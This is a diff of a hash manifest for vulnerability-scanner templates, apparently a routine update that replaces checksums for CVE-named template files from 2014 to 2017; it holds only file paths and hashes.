-http/cves/2014/CVE-2014-9119.yaml:de8210216bdda98ecd56ff594f83eaabc22d4973 -http/cves/2014/CVE-2014-9180.yaml:3a173eea1bc1acce6dea41ac1db21c8d0079b4ca -http/cves/2014/CVE-2014-9444.yaml:b0fc789f9a724962b3d390257e8d78261cd780e9 -http/cves/2014/CVE-2014-9606.yaml:1005cf722f4692aa988a587e1e54fe5e1ca1745e -http/cves/2014/CVE-2014-9607.yaml:ec562c71febceb9083f73c23d1f207d7d9b905f7 -http/cves/2014/CVE-2014-9608.yaml:90c04d3552c284d911f743fe1d8ee1f975a6ab64 -http/cves/2014/CVE-2014-9609.yaml:9792229d5d921a8ca68dd63b4d727430ca0be106 -http/cves/2014/CVE-2014-9614.yaml:566e637762ac5d94dd5053f543de6e9b8a818eac -http/cves/2014/CVE-2014-9615.yaml:24bebe1884ce553954ed1dfa340dabdd94fea19d -http/cves/2014/CVE-2014-9617.yaml:eb5a2f248bf7f8eafbbc060bdce498cea4612762 -http/cves/2014/CVE-2014-9618.yaml:008082c2035a72bc630d48911e8958c777b203a2 -http/cves/2015/CVE-2015-0554.yaml:32efadb73852c86d8d48cc2c54a2870faaeae804 -http/cves/2015/CVE-2015-1000005.yaml:a0ec59b8eb06798c40b05a5c5ddf31d32aef3610 -http/cves/2015/CVE-2015-1000010.yaml:9ec6648e0af32d1930d8d6a0b226587f68736021 -http/cves/2015/CVE-2015-1000012.yaml:9f1aa92e650f790a2ccbf21ab0d054a4e30af576 -http/cves/2015/CVE-2015-1427.yaml:cabddb89eca4920f4ab4b3369cc930e0c527f801 +http/cves/2014/CVE-2014-9119.yaml:eada117a763809eb1055654ab3ed2bd12b78c6ea +http/cves/2014/CVE-2014-9180.yaml:a923cf073ae325b48a835a3ddf3f7cca1b071c3c +http/cves/2014/CVE-2014-9444.yaml:95f974d28056f7f4c25e1f631a8422954ab9e47e +http/cves/2014/CVE-2014-9606.yaml:bf77871ec9d1fc0e7f2bc455e748a4f00ebac350 +http/cves/2014/CVE-2014-9607.yaml:0ded1aac56312cb52bbd283ed0f7b41702825839 +http/cves/2014/CVE-2014-9608.yaml:42a4b228ef7ba8d46f376e771afdaff3a53c505f +http/cves/2014/CVE-2014-9609.yaml:38c947cf650323ea1d8e8b8d53681da0c48cc570 +http/cves/2014/CVE-2014-9614.yaml:cf76492cec10dfca8ed52742a90ccfe45b045099 +http/cves/2014/CVE-2014-9615.yaml:b4d823180fea0e61611a4387c0613e50f557c702 +http/cves/2014/CVE-2014-9617.yaml:8111bbbbb0e5182d9bb3c8d815587ccdd241b4ec +http/cves/2014/CVE-2014-9618.yaml:db652edc0312d19396b8f899c50f77edd1f4a922 +http/cves/2015/CVE-2015-0554.yaml:72ddd3639c3c939ee35e05a4907a3aad7ba42ecc +http/cves/2015/CVE-2015-1000005.yaml:d4579422cf63d25dfd2b313675fb07d9df8d10d8 +http/cves/2015/CVE-2015-1000010.yaml:2888c1cd6cf0777446437c94000225d2e1f45e3e +http/cves/2015/CVE-2015-1000012.yaml:c67bc333a0a26b3fe067fa880e739704e6bc6e1f +http/cves/2015/CVE-2015-1427.yaml:9c67d675e92b701083108c689670e781af5c4fc6 http/cves/2015/CVE-2015-1503.yaml:0f2744618c4b3cf34254c74ec2c6299021f8a027 http/cves/2015/CVE-2015-1579.yaml:373a3efbc1dacdde973db0145d6df76ab0b8c8ee http/cves/2015/CVE-2015-1880.yaml:1e4c87fc9335261ea3064eb7b548597e601cc072 http/cves/2015/CVE-2015-20067.yaml:785c1c2db6a4483739645939a7ba573a05503406 -http/cves/2015/CVE-2015-2067.yaml:c060ed46cfa348bc48ddd2c678637d440c6bc84b -http/cves/2015/CVE-2015-2068.yaml:2aaa630296e89a1feb54900fdf54b1d6de0bb567 -http/cves/2015/CVE-2015-2080.yaml:7a7feb5ef598c587773efaa82a7062781a306765 -http/cves/2015/CVE-2015-2166.yaml:9058aa49e523a9c2fb29f25d8dd520465bec4ec2 -http/cves/2015/CVE-2015-2196.yaml:2ae04be5abc56399deb84eab6784b926bc8cbaa5 -http/cves/2015/CVE-2015-2755.yaml:b638da128cc01c1fd2a579fa81b56525e31d88b2 -http/cves/2015/CVE-2015-2807.yaml:1239edd35724e1e358b2f3b8ccadbeabb1835d3b -http/cves/2015/CVE-2015-2863.yaml:ec1338b06922df97b2bfd0cdc6416d619b8a1a91 -http/cves/2015/CVE-2015-2996.yaml:d2558b4ecc592a077165d1a271ada71f7f61627d +http/cves/2015/CVE-2015-2067.yaml:ebbb7cbd7bfd65404c65ca258f2f990e6a0de1b6 +http/cves/2015/CVE-2015-2068.yaml:f3d2d02a7e8ab9be9ab3c5a5b143f4eee753f5de +http/cves/2015/CVE-2015-2080.yaml:0c5591cd4eee4af1b358d9eada8509d79fe562d5 +http/cves/2015/CVE-2015-2166.yaml:631648ed083f46b347ae9f4455aa4d3a25708b8e +http/cves/2015/CVE-2015-2196.yaml:723647b209e2a31e803d3c50dcc4bca3b98cb1ff +http/cves/2015/CVE-2015-2755.yaml:de5fe290ac4d6f4dcaf574403aeca81149d78b9c +http/cves/2015/CVE-2015-2807.yaml:fa6e1d4698617ea23c0b28e75eaa451f13d801fb +http/cves/2015/CVE-2015-2863.yaml:58b40110b4cd58c61a2a2df57de1369f3e21377b +http/cves/2015/CVE-2015-2996.yaml:1251a7b2af01f5ef1a6c09576fc3ab0a0875158c http/cves/2015/CVE-2015-3035.yaml:9372c9cf6e506dc888f0c2c5e554e7525cf5f1d4 -http/cves/2015/CVE-2015-3224.yaml:ab850cde470de6acdce6912f7beb6b498c47db0a -http/cves/2015/CVE-2015-3337.yaml:601595ec9921dfb047802b78f43a67cce66aef12 -http/cves/2015/CVE-2015-3648.yaml:9b9ae734fc50d1b34aa02d101db52ed226151b56 -http/cves/2015/CVE-2015-3897.yaml:489deff435a73040e38b47b0679aae6f410fd995 -http/cves/2015/CVE-2015-4050.yaml:36bf1d6f6376c1fb0cfa16208f0864f11a4e9670 -http/cves/2015/CVE-2015-4062.yaml:efaf94450098f7ac36c9a8bd605e971ae9233f2c -http/cves/2015/CVE-2015-4063.yaml:bf34592d1c63c4ce9fea721509f70e23baf46421 -http/cves/2015/CVE-2015-4074.yaml:09d9bd14200aca7bc8c6a935d56be1376e709903 -http/cves/2015/CVE-2015-4127.yaml:7ce63a4befc500b2b2cbd88ee33db9b8b39c4385 -http/cves/2015/CVE-2015-4414.yaml:1b4f222aec1eb8fa93f40abe434bc462e779222e -http/cves/2015/CVE-2015-4632.yaml:597a9983b6f01ab29d5f6a39015f1ad84cbf762a +http/cves/2015/CVE-2015-3224.yaml:a63c77981a4280f8b66ade59e2899118ca7b8491 +http/cves/2015/CVE-2015-3337.yaml:fda0ea7fb057b854f4ab2f7857619df74759f94c +http/cves/2015/CVE-2015-3648.yaml:18bf2ac2018240e6a45692cbb755ca050333a8b4 +http/cves/2015/CVE-2015-3897.yaml:65cf0f22a4aefb735498f976f4b57073442e8f84 +http/cves/2015/CVE-2015-4050.yaml:b58e1a6ed2bb112db291c6a99078549ab91cfd14 +http/cves/2015/CVE-2015-4062.yaml:cadd6a47cb989014d29915a2cfe057732f75451d +http/cves/2015/CVE-2015-4063.yaml:09b77b83d9e853582ff8b37c9e8525fc7364d7ec +http/cves/2015/CVE-2015-4074.yaml:cbad9d8fb1019955f8aa2c88785a7edac96c6282 +http/cves/2015/CVE-2015-4127.yaml:a41f3c3b33c48c90a1c57cceb19e0c10ad123491 +http/cves/2015/CVE-2015-4414.yaml:43910587e5d07548453fbc1d0464b30ad00f70c5 +http/cves/2015/CVE-2015-4632.yaml:6841154f877163f3de881d8e20cf585ce242fbfa http/cves/2015/CVE-2015-4666.yaml:9eb9a9b837620215671bf488ea68ad54f8019ac3 -http/cves/2015/CVE-2015-4668.yaml:0dd2d7415932798258c13ba1edb1ebdaf997296a -http/cves/2015/CVE-2015-4694.yaml:889589a7c9c675ffe64333e5969165039324522a -http/cves/2015/CVE-2015-5354.yaml:4c3723f4d6d3677af37d6b4ee11e639f9b74cc9b -http/cves/2015/CVE-2015-5461.yaml:0cb9f6ec20f635ba22a0512fdcd1ad3d3611a53f -http/cves/2015/CVE-2015-5469.yaml:17c0484918fabbc6dd4fbad3997abb3f7786736d -http/cves/2015/CVE-2015-5471.yaml:0f2ec6b7ee2a47fe8fbeddfb9f15ce91c02711f8 -http/cves/2015/CVE-2015-5531.yaml:a95e6371297d2bc454947a63bb3bf3812d8e5627 -http/cves/2015/CVE-2015-5688.yaml:a4cd9a921a8d2deac1c956b58ed869bf7df70516 -http/cves/2015/CVE-2015-6477.yaml:adbdc7a1bac85967a0c388c3b52a7860d7ac6521 -http/cves/2015/CVE-2015-6544.yaml:aa355cfac1ebe6c4737e6f71002945913cc4c593 -http/cves/2015/CVE-2015-6920.yaml:1c3a18a5f7d39211dbc4fd74c6371a107af37f5f +http/cves/2015/CVE-2015-4668.yaml:25706e5408c73c6b5db77c986dd33c588c28736b +http/cves/2015/CVE-2015-4694.yaml:f4dde43e4cb4c53ccecf46ae702a5da645e9645b +http/cves/2015/CVE-2015-5354.yaml:17a76809534447349382d624c6e224817ff01e29 +http/cves/2015/CVE-2015-5461.yaml:932e8dc8dc01fb87e61d970cf76a14a164f43acb +http/cves/2015/CVE-2015-5469.yaml:96a20aaabeb1b7591d6091a09ce7eff21d41cfc1 +http/cves/2015/CVE-2015-5471.yaml:5758de35089d15d75f5edc923bc5d48ab62ca5b6 +http/cves/2015/CVE-2015-5531.yaml:1039ef657b29ceddd7d2a613a7d377e0b93ae517 +http/cves/2015/CVE-2015-5688.yaml:9bd0567d83c4d7470c11a167c8c3b24d902f4594 +http/cves/2015/CVE-2015-6477.yaml:7cd75eb12cce51bf5f84f73076dde1c8873c2c92 +http/cves/2015/CVE-2015-6544.yaml:6ceae4618b0dd5bfcb79ad7b1a0685637d3a8c94 +http/cves/2015/CVE-2015-6920.yaml:784324f87198bc97c4cab2fb54eaaa9df808c2bc http/cves/2015/CVE-2015-7245.yaml:d16307d527da9a9c9f3cfc4b2776498a2446914a http/cves/2015/CVE-2015-7297.yaml:ee6ffdbb3ecf6708fdf76decf78db3961954b8b8 -http/cves/2015/CVE-2015-7377.yaml:1cc1bc110f50c5ef5013e2f11c9b2b151e588024 +http/cves/2015/CVE-2015-7377.yaml:5205ced70816c3bea00a541fa22ab6daef6de404 http/cves/2015/CVE-2015-7450.yaml:66f2047a25e502a75785f4fc032ad09acbcf0781 -http/cves/2015/CVE-2015-7780.yaml:2117518946e59f3496260e8b5bc308a63223156a -http/cves/2015/CVE-2015-7823.yaml:8bb3ebb974775259f38578905fdec4a6f15b985a -http/cves/2015/CVE-2015-8349.yaml:1c9fdc394fb7d53fc7a931511c40d5fe5b30cfaf -http/cves/2015/CVE-2015-8399.yaml:3be9edcc62fd5b9c47bdd1f435a036ea53eb3a59 -http/cves/2015/CVE-2015-8813.yaml:691e858883eedb760672e7ef13768230f79ca0f5 -http/cves/2015/CVE-2015-9312.yaml:a1eed39b0e78232e1f0c63bc18d8b381bc88db48 -http/cves/2015/CVE-2015-9323.yaml:04954433b5741d33f0186a5d65c1559a0b52c354 -http/cves/2015/CVE-2015-9414.yaml:5f4139d71769551cd4c7cb490959f1322a7af9cc -http/cves/2015/CVE-2015-9480.yaml:4e2d4ccee9f0d9e21859e92e2f536b67653f3f05 -http/cves/2016/CVE-2016-0957.yaml:807b4afccee04028a414946faff369fa105c370a -http/cves/2016/CVE-2016-1000126.yaml:5002b552547b00c11d36cdfa0d8d94e244e7ce05 -http/cves/2016/CVE-2016-1000127.yaml:ae4433a4f9c3b72837801483d609c3582289fc1e -http/cves/2016/CVE-2016-1000128.yaml:77663a9f3bcf2d1d84e7a24185bcb544bca9bf53 -http/cves/2016/CVE-2016-1000129.yaml:275197fbd0f5648e66541c4e3490a1446c109a75 -http/cves/2016/CVE-2016-1000130.yaml:e8ef1bf42f0beef512763a03f13967f32049b152 -http/cves/2016/CVE-2016-1000131.yaml:1877372f224a416860ff84ce5f6e0ddfe54e47e7 -http/cves/2016/CVE-2016-1000132.yaml:9ceb0058db30b1d13077ccbc2a29aa5b39c29a57 -http/cves/2016/CVE-2016-1000133.yaml:c64f92554f99e03b55270ecd7e53f886054b9aaa -http/cves/2016/CVE-2016-1000134.yaml:92bbbc5b5e5cbaf218607dafe2f5f57b35b53348 -http/cves/2016/CVE-2016-1000135.yaml:ec1649b0dec05354e9f236447fb06648286a8c7f -http/cves/2016/CVE-2016-1000136.yaml:8576c4031ccb748dd2b4739d9b7bd28ef8c2c836 -http/cves/2016/CVE-2016-1000137.yaml:ff696d854de7a5f6d8e66bf0c2df04e2c1674ab1 -http/cves/2016/CVE-2016-1000138.yaml:f0835b442e9c1f9aa8b7933dfda78b05aab526fa -http/cves/2016/CVE-2016-1000139.yaml:d91a57c78f53800842025fa4e720c667d02ca7db -http/cves/2016/CVE-2016-1000140.yaml:64d3e41d2af3fa7868a8a08e0eec4a4a8b1bb2d5 -http/cves/2016/CVE-2016-1000141.yaml:814a44c12a70b62da3ee5f897ee603bf175bc154 -http/cves/2016/CVE-2016-1000142.yaml:931a38162f1d833a8e9ceb30bd6d2c72d4ff80b4 -http/cves/2016/CVE-2016-1000143.yaml:78af80b229c3c5d046a3361d6651039e0c5c6c82 -http/cves/2016/CVE-2016-1000146.yaml:355108e57f80a33f404491542cc29a1b966ea064 -http/cves/2016/CVE-2016-1000148.yaml:32e65027c2671e1e061c5560dd60786614939383 -http/cves/2016/CVE-2016-1000149.yaml:d9c7c749efae4a9f22fcba2034326dc395bad895 -http/cves/2016/CVE-2016-1000152.yaml:4439381d8536f265651dd0de8b5dc3a2dc35c6f5 -http/cves/2016/CVE-2016-1000153.yaml:5d4072b8088fbb67750048ec12fcbc2f18c66ac1 -http/cves/2016/CVE-2016-1000154.yaml:805c4105469b2b4b0277758e74e2d441ec406fce -http/cves/2016/CVE-2016-1000155.yaml:774f85588816087ca06110f6a3140c2714a7806d +http/cves/2015/CVE-2015-7780.yaml:b765360f8519be64f169912be86f5d258ff7232d +http/cves/2015/CVE-2015-7823.yaml:a5ae838ae2bef8ad5f57860f3e0be280bf27da9f +http/cves/2015/CVE-2015-8349.yaml:931d94d20ee04e4d8e9985f5e5da8ffb3a2d853a +http/cves/2015/CVE-2015-8399.yaml:62bd9007002816d898f4523ff4c9fead98420c8e +http/cves/2015/CVE-2015-8813.yaml:e6b3ca1be9c5835aa42bb6174db069a153e71a51 +http/cves/2015/CVE-2015-9312.yaml:1ab007b8ff61ae3a433e52fab85807126252c29b +http/cves/2015/CVE-2015-9323.yaml:62b38c29c91ba7eba0f8cc7ea8d830b682ce17bd +http/cves/2015/CVE-2015-9414.yaml:97e0fda6442a32ca1bd2cbab9e000f6a2e2a3b57 +http/cves/2015/CVE-2015-9480.yaml:fa4f3f93a43aa35b0468c345804f81013f89cc4e +http/cves/2016/CVE-2016-0957.yaml:519c486d40bb3523104a842321309e0803658d9b +http/cves/2016/CVE-2016-1000126.yaml:a63cfc630d17d548b5e3ea4f954567d113df4923 +http/cves/2016/CVE-2016-1000127.yaml:75e2a3c84d7cd55de320efbe2196ae5b9d903e1f +http/cves/2016/CVE-2016-1000128.yaml:a1e56182d2b21cb925ddd3fbb4b8b7a9360d9967 +http/cves/2016/CVE-2016-1000129.yaml:537871aaf9c06342144a6560dbc432755f0559bf +http/cves/2016/CVE-2016-1000130.yaml:f70b9b0d99527a3094aa693bd7dc1a1b99b328ca +http/cves/2016/CVE-2016-1000131.yaml:984ec4850463eb7d6fae33b3cfecde5b7437046d +http/cves/2016/CVE-2016-1000132.yaml:165ff22b7fc096108f66055245fc943f74f5aa95 +http/cves/2016/CVE-2016-1000133.yaml:cdbd115d28e302f4cdfd0ec4818d46a657cfaa33 +http/cves/2016/CVE-2016-1000134.yaml:0827f07f15375edf33deb6f0afd4dc38166006d6 +http/cves/2016/CVE-2016-1000135.yaml:1c559d1b2e42a998d8809969f26aecda67f2ffbc +http/cves/2016/CVE-2016-1000136.yaml:ced6e0c603c0db2bef544c8f9c18d73dc2385af4 +http/cves/2016/CVE-2016-1000137.yaml:ce28a8bdb7b0f49dd548ceb2a9ddfba846fd316f +http/cves/2016/CVE-2016-1000138.yaml:3a825b5c67e3cbd035e74e9dc5f363cf0c79bed7 +http/cves/2016/CVE-2016-1000139.yaml:d2c1097c431a6524c1087fb2c01ed0b6c08bcf10 +http/cves/2016/CVE-2016-1000140.yaml:133c9b5f01344e4f7280d6fa7771ab43bd1650b3 +http/cves/2016/CVE-2016-1000141.yaml:2ee512cb9568c058d4bac32a4c99d86fbc829330 +http/cves/2016/CVE-2016-1000142.yaml:73aa0eca586074c93db3d8cdcc6c08317eb4c547 +http/cves/2016/CVE-2016-1000143.yaml:3226ffe73c4087985bb420734706f353d8cf861b +http/cves/2016/CVE-2016-1000146.yaml:6f704e032ff870d0b4177c7c5fc87284c8d3b5d2 +http/cves/2016/CVE-2016-1000148.yaml:3827404e271be436434ee35c60f67de9977ba89f +http/cves/2016/CVE-2016-1000149.yaml:51e0714511f13a6af313af26a55a1f618d0487fb +http/cves/2016/CVE-2016-1000152.yaml:eac328d94e603f458c34aac1ce074f169059742b +http/cves/2016/CVE-2016-1000153.yaml:bc5538b6b3e99e86090e0c407576f01f40970398 +http/cves/2016/CVE-2016-1000154.yaml:627aa66e52c4bda2e50b91935fc7465b7de939a5 +http/cves/2016/CVE-2016-1000155.yaml:8bbfbc0ccc148663bb07db6c37184593cc55c849 http/cves/2016/CVE-2016-10033.yaml:ff427d6717b04469ca268756bf51005390fd2e7b -http/cves/2016/CVE-2016-10108.yaml:56b06c375aee723437714d88b0bd02e57e3145e1 -http/cves/2016/CVE-2016-10134.yaml:ee593e10ecde79a40af9f520370b68b66604b36b -http/cves/2016/CVE-2016-10367.yaml:17109023d03be7ad2312cc2e6259c31fd339ade4 -http/cves/2016/CVE-2016-10368.yaml:88d1c35e908cb3d034d93ed7cfbe07ab58eb9e00 -http/cves/2016/CVE-2016-10924.yaml:932bc497de4d0bc94ca91832d9cc597ea2138725 -http/cves/2016/CVE-2016-10940.yaml:1fab0193852a1f1a35e6853d88ea41d206a0f3f1 -http/cves/2016/CVE-2016-10956.yaml:85a485cb50670757cc752bc0f67c54e619d10473 -http/cves/2016/CVE-2016-10960.yaml:917231c3d8dceadb73b767ab00d85bc2dc5b51ad -http/cves/2016/CVE-2016-10973.yaml:6f040a563c628b3d9b5996136853562195d86910 -http/cves/2016/CVE-2016-10993.yaml:564e6c03ad6f6d76f8b1ed123cf5a0d7839b48a6 +http/cves/2016/CVE-2016-10108.yaml:ec0b1d29c4e800ea14c1198f82cd7a0260e5e5d6 +http/cves/2016/CVE-2016-10134.yaml:e909692302cb2b73cd94da87b411612cf22f8a1c +http/cves/2016/CVE-2016-10367.yaml:2ef039ce0aa1dd07dcd84cddc2933faca2ea762a +http/cves/2016/CVE-2016-10368.yaml:bd6e258e20d2ef46c42a5ef817e46c750adf91b8 +http/cves/2016/CVE-2016-10924.yaml:e37d36f60148b548a9eba86e7133e763542b2660 +http/cves/2016/CVE-2016-10940.yaml:d4557777b52139a46d53eaed932a7cd436b73ff4 +http/cves/2016/CVE-2016-10956.yaml:0bf8129ca75e2c4bd2460302fe0d9636bbadcb8e +http/cves/2016/CVE-2016-10960.yaml:e20f8f457d039e64dc16e3504d61ff90c951c390 +http/cves/2016/CVE-2016-10973.yaml:9e0bf1d13db2d0888a8863c4b937272915124c81 +http/cves/2016/CVE-2016-10993.yaml:670e89ff74276ade3f3c5d1936e60110f5e1ef7c http/cves/2016/CVE-2016-1555.yaml:2d9fcb1bb031988443edec236386c5ad45f6aeda -http/cves/2016/CVE-2016-2389.yaml:5a3deb8e2258dda441940ea98310a76570cd58d3 +http/cves/2016/CVE-2016-2389.yaml:c456692b8848861df22efb5735b52e4142997cf9 http/cves/2016/CVE-2016-3081.yaml:a0cacaef1341e95df63b04a33f5d33663ee34c1f -http/cves/2016/CVE-2016-3088.yaml:721c2135eae31f1433af1d38d2190dd32eb16321 -http/cves/2016/CVE-2016-3978.yaml:e773d6f4bf393cac62db0241909237d6b178b0e8 +http/cves/2016/CVE-2016-3088.yaml:c9c85090543808dc39189156db6ae606762714f1 +http/cves/2016/CVE-2016-3978.yaml:ca54daa417b20fc3883365f9a3513986767f6288 http/cves/2016/CVE-2016-4437.yaml:53891086eb7ca7b004ead29f85f6c42cb81ae42e -http/cves/2016/CVE-2016-4975.yaml:8ab364d0cbec45e473ab5ced9552ce6554e90ca5 -http/cves/2016/CVE-2016-4977.yaml:47589ba2758f11984b6aafe45660fead6a9e218d -http/cves/2016/CVE-2016-5649.yaml:4d34c9aa58c1ae0b638eeac89271143070f3bb11 -http/cves/2016/CVE-2016-6195.yaml:c3c4b7c778141c639fc7aa78b6ca6f76a3c06573 +http/cves/2016/CVE-2016-4975.yaml:3ad3cc887a225b8c201120a90309c70a6b256892 +http/cves/2016/CVE-2016-4977.yaml:7fe4aa04d1287fa7a2b9b7b0ccc4b48787143841 +http/cves/2016/CVE-2016-5649.yaml:f73ffdca40c7fcbce0a27835e7edba78c8f23591 +http/cves/2016/CVE-2016-6195.yaml:8f2c5ac410ee7c7b4c5b027cbfe40bd0bbbfbb9b http/cves/2016/CVE-2016-6277.yaml:97591cf72add324cc4b173a103e32d9b17534a1e http/cves/2016/CVE-2016-6601.yaml:87a3cc98117de752e21b4bed5d478586387c27cf http/cves/2016/CVE-2016-7552.yaml:66fd74b271d05c00f33e3e83476a2bc98d75e90f http/cves/2016/CVE-2016-7834.yaml:dc4df66c83fb5a5dfa0a63086db6e75ec80e4c70 -http/cves/2016/CVE-2016-7981.yaml:44f03ec6448a211b29908867369fd35f438db809 -http/cves/2016/CVE-2016-8527.yaml:f135110b5652385ec84f17cf323bf2e00420783b -http/cves/2017/CVE-2017-0929.yaml:ecf263fa6e41747703db2b4ed8695d0d2b75fa69 +http/cves/2016/CVE-2016-7981.yaml:fc7dc59e2af16debd53c9b6c8b457852e4090b4a +http/cves/2016/CVE-2016-8527.yaml:40e0abb25e22f2e0d46e0c9ad27c3ed314501bc4 +http/cves/2017/CVE-2017-0929.yaml:08fb1b9bcb8d2b94525dd1220b968de1d2fa4b5a http/cves/2017/CVE-2017-1000028.yaml:1d2ad80af3e686ae5c7e60e6bfa486c875926c5e -http/cves/2017/CVE-2017-1000029.yaml:c9e7bdc380f663d02aae30b7b5f9cfe11b5aa829 -http/cves/2017/CVE-2017-1000163.yaml:e6ad31b6eb674afdae4421c97d325d0c7bb415b0 -http/cves/2017/CVE-2017-1000170.yaml:176788bc5324b14fbc5ee7d2dbc151f1a6c95c34 +http/cves/2017/CVE-2017-1000029.yaml:6731c9f0e550e2210952d669f000d1d52b444c9b +http/cves/2017/CVE-2017-1000163.yaml:81215f12b4d6a7a656b8a26f21635684a6482375 +http/cves/2017/CVE-2017-1000170.yaml:69ea30fda96a6a94ac11a93be9691dc2e8269963 http/cves/2017/CVE-2017-1000486.yaml:564ad9d2cf12068a9e0e4a387adee94e903e57fd -http/cves/2017/CVE-2017-10075.yaml:eef67f20edd46d8c87f33bc4965317ee76687528 +http/cves/2017/CVE-2017-10075.yaml:a15f7e127d6c5274d57e0ad20a449750d695605d http/cves/2017/CVE-2017-10271.yaml:1d091d6da12160560fc8eb0d91bceeb71e2303ca http/cves/2017/CVE-2017-10974.yaml:5358a5ad5837fa86cddcab84253b5899c4c69acb -http/cves/2017/CVE-2017-11165.yaml:c3f7857cac4fc7a24ab16b1b065131dccbe9dda0 -http/cves/2017/CVE-2017-11444.yaml:4653b0c55ad1d5a077afd19935568906a546b17f +http/cves/2017/CVE-2017-11165.yaml:db61b196dd3ceee2b78bc9bbb3db31938852e3a3 +http/cves/2017/CVE-2017-11444.yaml:dfb86c870e0d5b8fc43257ecf02f8b7cf0f3d7e4 http/cves/2017/CVE-2017-11512.yaml:78dea4779ed34d22dc015cda77e332ad102c030c -http/cves/2017/CVE-2017-11586.yaml:362f3a77eafba856c4c1116754ce7f86c9271cde +http/cves/2017/CVE-2017-11586.yaml:34160dae5bc05c1bd43b2b2ab5ebf86f4f1cf134 http/cves/2017/CVE-2017-11610.yaml:d65650c579eca57f3cddbef4b45ed3fc125f71de -http/cves/2017/CVE-2017-11629.yaml:9e4f0034a4ae61b23e05d21848b0abd3c329b7bd -http/cves/2017/CVE-2017-12138.yaml:a399c8df9c08b6ee101f3c2aaf7de0ab73be9a6d +http/cves/2017/CVE-2017-11629.yaml:fcbaa364b2b3ae315080001ab7feb811de1823f3 +http/cves/2017/CVE-2017-12138.yaml:37639c0975871b885a6933bb50b6abec9e78131d http/cves/2017/CVE-2017-12149.yaml:d587ea31406e1c078d4e1783c9ba3ace517cfe12 http/cves/2017/CVE-2017-12542.yaml:87bebd3be856118046be1ecfff1d8a78d3e33638 http/cves/2017/CVE-2017-12544.yaml:5966969f12a5f7ac29e327e4e60fc98043073b04 -http/cves/2017/CVE-2017-12583.yaml:35b106fc2d36e25ded6f9e0fcb0ab2ec13727ba4 +http/cves/2017/CVE-2017-12583.yaml:c2cf4943e325c0cfa2389abaa791834ba0fd963c http/cves/2017/CVE-2017-12611.yaml:72945a5fa1ab69b3569c337ce49f8ede9f1cc52b http/cves/2017/CVE-2017-12615.yaml:9bbdbee00fbdb72ed33937152b62ccff302806ed http/cves/2017/CVE-2017-12617.yaml:0db5077b2ec85da0e15a2dc235153b6d8d7dffa5 -http/cves/2017/CVE-2017-12629.yaml:b92a34287f5c591a9c933adf451e80ba74cd134d +http/cves/2017/CVE-2017-12629.yaml:9d736838fbcda18ff3eaf95ad100f06f824b09b8 http/cves/2017/CVE-2017-12635.yaml:8ad42aac15973767a778ff7f20dea04c20cb3a5f -http/cves/2017/CVE-2017-12637.yaml:294f4b7e6b832566f31a35b20e57f574a0e179d3 -http/cves/2017/CVE-2017-12794.yaml:cb405d473f9f91c12d728a3a0ef012b16659cccd +http/cves/2017/CVE-2017-12637.yaml:1deda9254070ba8fb6a6cd46228b8e20de82d7d2 +http/cves/2017/CVE-2017-12794.yaml:ee4519a575872f4696e3855f83ad7d93fb841eb4 http/cves/2017/CVE-2017-14135.yaml:89740c7b7102ed37ca93456c64549f4399387208 -http/cves/2017/CVE-2017-14186.yaml:02a408ce307ddb72060fe19b6ec4815caf7be8ae -http/cves/2017/CVE-2017-14524.yaml:9f9b0bc5ca7d9c1784ac3ef4ded727e34d2bc80c -http/cves/2017/CVE-2017-14535.yaml:6ae46f988e4154602d432ce336cec43c9ba94e3d -http/cves/2017/CVE-2017-14537.yaml:0ff13d7247c214b028ad4821c32021196a0023d1 -http/cves/2017/CVE-2017-14622.yaml:8fbdc06d99c63e683003e65fe81f3a20e0c64583 -http/cves/2017/CVE-2017-14651.yaml:5453045a3616f91e59689dffce4df9b2f935cd16 +http/cves/2017/CVE-2017-14186.yaml:e4e561a2ff9e7223c12418fbc5e5a437877a8a88 +http/cves/2017/CVE-2017-14524.yaml:1a7cffc2445f12592802111947de48248b8cc3e3 +http/cves/2017/CVE-2017-14535.yaml:37919529779a1b688517251cc795e40b6f41f8eb +http/cves/2017/CVE-2017-14537.yaml:c87b50ee8512fec4c5559c8336ed07fddc9093c7 +http/cves/2017/CVE-2017-14622.yaml:667c1ddf0e41d3c35aed12614979b6a1644abc6c +http/cves/2017/CVE-2017-14651.yaml:61b3e15cc976020fad67b13e768ae9763abd06dd http/cves/2017/CVE-2017-14849.yaml:bd68eafe4e19257c4f0b13f7fe3a2105cc360a87 -http/cves/2017/CVE-2017-15287.yaml:7256a770ee289f3acb148a5121ad54f9370ba0a6 -http/cves/2017/CVE-2017-15363.yaml:2cefd6cf79020f2680ac1eec52cd80e90b7c3244 -http/cves/2017/CVE-2017-15647.yaml:36e879557fa6d39b18c2596d24971a1377892e2d +http/cves/2017/CVE-2017-15287.yaml:d8792acc7926801061415767f384c84b681a9daa +http/cves/2017/CVE-2017-15363.yaml:870ddce7d8a528579c364f3b40930243c54e2b03 +http/cves/2017/CVE-2017-15647.yaml:9ab6d98a5fd4c8d572c81c40ec91f090ddb76874 http/cves/2017/CVE-2017-15715.yaml:80f9b64cf4f8cebfc1bc195fc6a55213103334ca http/cves/2017/CVE-2017-15944.yaml:42e8f082d92b49196031c80436f102e7279b4fc0 -http/cves/2017/CVE-2017-16806.yaml:b1f6ecfa4eba290fe555758d710940dec3e8ee57 -http/cves/2017/CVE-2017-16877.yaml:924c830f0db7482557e199f0c6b60ec619b226e8 +http/cves/2017/CVE-2017-16806.yaml:8e485b6adaeef67fcdf5305f4e63687391c43499 +http/cves/2017/CVE-2017-16877.yaml:1386b62c2feb6dd33fa88f959e0d244a23d4ef88 http/cves/2017/CVE-2017-16894.yaml:a0cd031a76387024deb79ddf111788535f85ede1 -http/cves/2017/CVE-2017-17043.yaml:85ba22a847f9b988d56bb3475bda9118e7fe99e1 -http/cves/2017/CVE-2017-17059.yaml:be6abdf0aeb2ebf21df5317c892a19c57199f87c -http/cves/2017/CVE-2017-17451.yaml:086dc4fe5324a5547acf9b4e252674e9a170cab1 +http/cves/2017/CVE-2017-17043.yaml:c0e4c36958d3a54d3f2933aa1d2b5837e4f2d953 +http/cves/2017/CVE-2017-17059.yaml:bed6ce575c735fe1e4953cf0bdb67eb225fd8453 +http/cves/2017/CVE-2017-17451.yaml:d249a8facdddfbe3d750aedd431518ae6873a140 http/cves/2017/CVE-2017-17562.yaml:afcf34c1719ba0de40353bdb7f914be77c4e1dba -http/cves/2017/CVE-2017-17731.yaml:050f2fe51b914098d7f51447b0df27ba376f674f -http/cves/2017/CVE-2017-17736.yaml:25e61f151fcbe21b6db43bb422470d5d41d8284a -http/cves/2017/CVE-2017-18024.yaml:95b1c5acb8ebadc89860f5964453be1204d26ea1 